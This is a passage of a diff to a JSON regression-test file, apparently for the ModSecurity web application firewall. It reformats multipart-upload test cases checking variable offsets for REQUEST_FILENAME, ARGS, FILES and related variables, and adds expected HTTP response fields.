\"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 3", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 3", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "501", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1247,483 +1648,573 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,8v5,23t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,8v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/f i l e\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: ARGS/Multipart 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: ARGS/Multipart 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "518", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,4v306,4t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ + "expected": { + "error_log": "o0,4v306,4t:trim", + "http_code": 200 + }, + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS \"test\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: ARGS/Multipart 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: ARGS/Multipart 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "615", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,5v402,5t:trim" + "expected": { + "error_log": "o0,5v402,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS \"test2\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,16v680,20t:trim" + "expected": { + "error_log": "o0,16v680,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES \"small_text_file2\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,16v512,20t:trim" + "expected": { + "error_log": "o0,16v512,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES \"small_text_file1\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_NAMES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_NAMES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,8o0,8v491,8t:trimo0,16o0,16v709,16t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,8o0,8v491,8t:trimo0,16o0,16v709,16t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_NAMES \"(fiasdfasdfledata|filedata)\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_SIZES 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_SIZES 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"v560,32t:trim" + "expected": { + "error_log": "v560,32t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_SIZES:filedata \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_SIZES 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_SIZES 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v754,38t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_SIZES:fiasdfasdfledata \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_COMBINED_SIZE", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_COMBINED_SIZE", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v560,32v754,38t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v560,32v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_COMBINED_SIZE \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_TMP_CONTENT 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_TMP_CONTENT 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o8,7v754,38t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o8,7v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1731,54 +2222,63 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_TMP_CONTENT 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_TMP_CONTENT 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o15,5v560,32t:trim" + "expected": { + "error_log": "o15,5v560,32t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1786,29 +2286,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - PATH_INFO", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - PATH_INFO", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "605", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1830,10 +2330,19 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,4v5,23t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,4v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 